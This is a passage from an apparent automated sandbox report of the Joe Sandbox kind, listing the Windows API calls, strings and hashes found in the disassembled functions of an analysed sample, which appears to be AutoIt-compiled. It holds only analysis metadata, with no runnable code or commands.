                    • Instruction Fuzzy Hash: 0BB10D75A00209AFDB54DFA5C888DAEBBFAFF48304B148569F909DB251DB30EE41CB54
                    APIs
                    • GetKeyboardState.USER32(?), ref: 006E05A7
                    • SetKeyboardState.USER32(?), ref: 006E0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 006E0632
                    • GetKeyState.USER32(000000A0), ref: 006E0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 006E0678
                    • GetKeyState.USER32(000000A1), ref: 006E0689
                    • GetAsyncKeyState.USER32(00000011), ref: 006E06B5
                    • GetKeyState.USER32(00000011), ref: 006E06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 006E06EC
                    • GetKeyState.USER32(00000012), ref: 006E06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 006E0723
                    • GetKeyState.USER32(0000005B), ref: 006E0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: ad645f4fd08b7bbe4471085bc9394c7e853a1fa28bc294d1176ffa7cd874f60d
                    • Instruction ID: 7ca18cef6b88853d2b73a8001599971dfd1b0be78f865d83786d0a9de4aec2f7
                    • Opcode Fuzzy Hash: ad645f4fd08b7bbe4471085bc9394c7e853a1fa28bc294d1176ffa7cd874f60d
                    • Instruction Fuzzy Hash: 0451DA70A067C429FF34DBA189547EABFB69F02340F08459DD5C25B2C2DAA49ACCCB65
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 006DC746
                    • GetWindowRect.USER32(00000000,?), ref: 006DC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006DC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 006DC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 006DC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006DC827
                    • GetDlgItem.USER32(?,000003E9), ref: 006DC835
                    • GetWindowRect.USER32(00000000,?), ref: 006DC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006DC889
                    • GetDlgItem.USER32(?,000003EA), ref: 006DC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006DC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006DC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 523a80353749f4d97bc21d8d016d86cd4d7ff4397690750258f5eedf618ee775
                    • Instruction ID: cde17c4d745d0ac40bcd668b30dbd881bcddcdf6dc3654645b3ddc3637592c53
                    • Opcode Fuzzy Hash: 523a80353749f4d97bc21d8d016d86cd4d7ff4397690750258f5eedf618ee775
                    • Instruction Fuzzy Hash: 45512E71F00209ABDB18CF69DD99AAEBBBAEB88310F14822DF515D7390DB749D00CB54
                    APIs
                      • Part of subcall function 00681B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00682036,?,00000000,?,?,?,?,006816CB,00000000,?), ref: 00681B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006820D3
                    • KillTimer.USER32(-00000001,?,?,?,?,006816CB,00000000,?,?,00681AE2,?,?), ref: 0068216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 006BBEF6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006816CB,00000000,?,?,00681AE2,?,?), ref: 006BBF27
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006816CB,00000000,?,?,00681AE2,?,?), ref: 006BBF3E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006816CB,00000000,?,?,00681AE2,?,?), ref: 006BBF5A
                    • DeleteObject.GDI32(00000000), ref: 006BBF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: 596933e3cda85f4b3321d49d52d69a97fb52d9257a80a6add3391cafa79b08c9
                    • Instruction ID: 8990d36dcfd15f001d7573eaf74d45c53a9e054c7f970224f0a228726e6d5d39
                    • Opcode Fuzzy Hash: 596933e3cda85f4b3321d49d52d69a97fb52d9257a80a6add3391cafa79b08c9
                    • Instruction Fuzzy Hash: DF61BD74100611DFDB35AF14DD58BB9B7F7FB02302F108629E1829AA60C7B9A881CF5A
                    APIs
                      • Part of subcall function 006825DB: GetWindowLongW.USER32(?,000000EB), ref: 006825EC
                    • GetSysColor.USER32(0000000F), ref: 006821D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 5032203a501cc152a854a42ea9dd508132a1422ad77cf95d63bbc5882421ba25
                    • Instruction ID: 98e3533ef65e7c887fb98d751185f15b6cb9b55d0ae000a2e2f08de58a66754d
                    • Opcode Fuzzy Hash: 5032203a501cc152a854a42ea9dd508132a1422ad77cf95d63bbc5882421ba25
                    • Instruction Fuzzy Hash: C8419471100145EADB216F28DC68BF93767EB06331F148365FD658A2E2CB358E82DB55
                    APIs
                    • CharLowerBuffW.USER32(?,?,0070F910), ref: 006EAB76
                    • GetDriveTypeW.KERNEL32(00000061,0073A620,00000061), ref: 006EAC40
                    • _wcscpy.LIBCMT ref: 006EAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: a2b6b4da1df53b345706a6caa8883597ac7eef72ad09373a5fa68acc3038dbdd
                    • Instruction ID: 534849c577dc1dcccf2801389a1f610473417d51a03b90c0ac5aa5a30ba30dd0
                    • Opcode Fuzzy Hash: a2b6b4da1df53b345706a6caa8883597ac7eef72ad09373a5fa68acc3038dbdd
                    • Instruction Fuzzy Hash: 6251CA311083419BC760FF55C882AAEB7A7EF85704F24492DF496972A2DB31ED0ACB53
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                      • Part of subcall function 00682344: GetCursorPos.USER32(?), ref: 00682357
                      • Part of subcall function 00682344: ScreenToClient.USER32(007467B0,?), ref: 00682374
                      • Part of subcall function 00682344: GetAsyncKeyState.USER32(00000001), ref: 00682399
                      • Part of subcall function 00682344: GetAsyncKeyState.USER32(00000002), ref: 006823A7
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0070C2E4
                    • ImageList_EndDrag.COMCTL32 ref: 0070C2EA
                    • ReleaseCapture.USER32 ref: 0070C2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 0070C39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0070C3AD
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0070C48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$prt$prt
                    • API String ID: 1924731296-2507818965
                    • Opcode ID: b42487a95a8859007b82776f709771c7c944a437493531b6af923da3f26a9b69
                    • Instruction ID: bbb080319989a9243c35f1af969b2e81504c0d64c028c1bc4ac8a5312e8a6398
                    • Opcode Fuzzy Hash: b42487a95a8859007b82776f709771c7c944a437493531b6af923da3f26a9b69
                    • Instruction Fuzzy Hash: 7A51AB74204305EFD714EF24C896FAA7BE5FB89310F00862DF5928B2E1CB79A944CB56
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: 18fb03cd8e01513adc0ace98754d5496d2a1af20d1502848a7fb230263956be6
                    • Instruction ID: 5758a759083e1e8a43e77c88e5e33b03686c860587e0272faf8faa6e96f25e02
                    • Opcode Fuzzy Hash: 18fb03cd8e01513adc0ace98754d5496d2a1af20d1502848a7fb230263956be6
                    • Instruction Fuzzy Hash: AD41D7B1504205AFEF24BB38DC42EB673EAEF45310F28456EF549D7291EA719D42CB11
                    APIs
                    • _memset.LIBCMT ref: 007073D9
                    • CreateMenu.USER32 ref: 007073F4
                    • SetMenu.USER32(?,00000000), ref: 00707403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00707490
                    • IsMenu.USER32(?), ref: 007074A6
                    • CreatePopupMenu.USER32 ref: 007074B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007074DD
                    • DrawMenuBar.USER32 ref: 007074E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 5007117e66b01a399909710b6e6108e4c8cbe32a9145b527480316973e29477f
                    • Instruction ID: e15a885ee6ea9b854cf8513a97f9fbae9d5854409c222be1e068e0872d0fab63
                    • Opcode Fuzzy Hash: 5007117e66b01a399909710b6e6108e4c8cbe32a9145b527480316973e29477f
                    • Instruction Fuzzy Hash: 76415778A00249EFDB24DF64D884E9ABBF9FF49300F144229F955973A0DB38A920CF54
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007077CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 007077D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007077E7
                    • SelectObject.GDI32(00000000,00000000), ref: 007077EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007077FA
                    • DeleteDC.GDI32(00000000), ref: 00707803
                    • GetWindowLongW.USER32(?,000000EC), ref: 0070780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00707821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0070782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: 48ea302791e75343a6c195b7716225ae4857ecc827373df24a752998d723f16a
                    • Instruction ID: 75b548bd8ee52e049ba00a3181e8f3b6046ea396089d3644c92035278fa06843
                    • Opcode Fuzzy Hash: 48ea302791e75343a6c195b7716225ae4857ecc827373df24a752998d723f16a
                    • Instruction Fuzzy Hash: 57318E31504115EBDF269F64DC08FDA3BA9FF09364F108324FA15A60E0CB39E821DBA8
                    APIs
                    • _memset.LIBCMT ref: 006A707B
                      • Part of subcall function 006A8D68: __getptd_noexit.LIBCMT ref: 006A8D68
                    • __gmtime64_s.LIBCMT ref: 006A7114
                    • __gmtime64_s.LIBCMT ref: 006A714A
                    • __gmtime64_s.LIBCMT ref: 006A7167
                    • __allrem.LIBCMT ref: 006A71BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A71D9
                    • __allrem.LIBCMT ref: 006A71F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A720E
                    • __allrem.LIBCMT ref: 006A7225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A7243
                    • __invoke_watson.LIBCMT ref: 006A72B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 5f978f9283bef269e9a48bd5b4babc49506cd6016e0b78ab11812f95e2cc9a21
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: 1771C9B1A04716ABD714BE79CC41B9AB3AAAF12324F14423EF514D7381E770DE408F94
                    APIs
                    • _memset.LIBCMT ref: 006E2A31
                    • GetMenuItemInfoW.USER32(00746890,000000FF,00000000,00000030), ref: 006E2A92
                    • SetMenuItemInfoW.USER32(00746890,00000004,00000000,00000030), ref: 006E2AC8
                    • Sleep.KERNEL32(000001F4), ref: 006E2ADA
                    • GetMenuItemCount.USER32(?), ref: 006E2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 006E2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 006E2B64
                    • GetMenuItemID.USER32(?,?), ref: 006E2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006E2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006E2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006E2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: e35c0da4f93ee544d8e3c7635be5675dff8a1f5b4530beaf65820c3ad1fbd0a3
                    • Instruction ID: 9d0823c423e6282080035cdd3fe2b2795aa39cff80e6584c29b1c451c12c6308
                    • Opcode Fuzzy Hash: e35c0da4f93ee544d8e3c7635be5675dff8a1f5b4530beaf65820c3ad1fbd0a3
                    • Instruction Fuzzy Hash: D161AEB090238AAFDB21CF65CC989EE7BBFFB01708F144569E84193251DB35AD46DB21
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00707214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00707217
                    • GetWindowLongW.USER32(?,000000F0), ref: 0070723B
                    • _memset.LIBCMT ref: 0070724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0070725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007072D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 08be42d898f25416342eff7df9434cca1c0e662143fa355bd19cd6ff9f07bee4
                    • Instruction ID: 228387f3c4b36c036944507b77d0f7fc47feb05f1e48b3e6d310e5ecefe6dbee
                    • Opcode Fuzzy Hash: 08be42d898f25416342eff7df9434cca1c0e662143fa355bd19cd6ff9f07bee4
                    • Instruction Fuzzy Hash: 09617C75900248EFDB10DFA4CC81EEEB7F9AB0A710F144259FA14A72E1D778AD41DB64
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006D7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 006D718E
                    • VariantInit.OLEAUT32(?), ref: 006D71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 006D71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 006D7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 006D7227
                    • VariantClear.OLEAUT32(?), ref: 006D723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 006D7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006D7252
                    • VariantClear.OLEAUT32(?), ref: 006D7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006D726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: 7b4b5c2638fc640b0b9de3ffe7783afa979a13842cbd514b88f8d44b969ad754
                    • Instruction ID: bfd087f397ea444743ba7ffced5f5683cb078f28871c06f5fa8bf2ba236ead5d
                    • Opcode Fuzzy Hash: 7b4b5c2638fc640b0b9de3ffe7783afa979a13842cbd514b88f8d44b969ad754
                    • Instruction Fuzzy Hash: F1416F31D00219EFCB10DFA4DC889AEBBB9FF08354F00816AF905A7361DB34AA45CB95
                    APIs
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • CoInitialize.OLE32 ref: 006F8718
                    • CoUninitialize.OLE32 ref: 006F8723
                    • CoCreateInstance.OLE32(?,00000000,00000017,00712BEC,?), ref: 006F8783
                    • IIDFromString.OLE32(?,?), ref: 006F87F6
                    • VariantInit.OLEAUT32(?), ref: 006F8890
                    • VariantClear.OLEAUT32(?), ref: 006F88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: 3dfd36efa32ab7cbfe7b51d5d88008af600dc7e3e2d3065ec432eddd82eb73ba
                    • Instruction ID: ea382759310e546eddd6301b66abfa29462c6c397e59254223ce7bc0b352388a
                    • Opcode Fuzzy Hash: 3dfd36efa32ab7cbfe7b51d5d88008af600dc7e3e2d3065ec432eddd82eb73ba
                    • Instruction Fuzzy Hash: F461FF70608305AFD710EF24C848BAFBBEAAF44750F14495DFA919B291CB30ED44CB96
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 006F5AA6
                    • inet_addr.WSOCK32(?,?,?), ref: 006F5AEB
                    • gethostbyname.WSOCK32(?), ref: 006F5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 006F5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006F5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006F5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006F5C00
                    • WSACleanup.WSOCK32 ref: 006F5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 46f22c4d8005e715558d1719329a40174e6b955b2b1db27d2de78cbddd0d0c4b
                    • Instruction ID: 1964fa8767eb8d8047ee3bde61853f41b8aee1d3e065213d827a75462e8d0865
                    • Opcode Fuzzy Hash: 46f22c4d8005e715558d1719329a40174e6b955b2b1db27d2de78cbddd0d0c4b
                    • Instruction Fuzzy Hash: 72517E31604704DFD720AF24CC59B7AB7E6EF48710F148A29F656DB2A1DB74EC018B5A
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 006EB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006EB7B1
                    • GetLastError.KERNEL32 ref: 006EB7BB
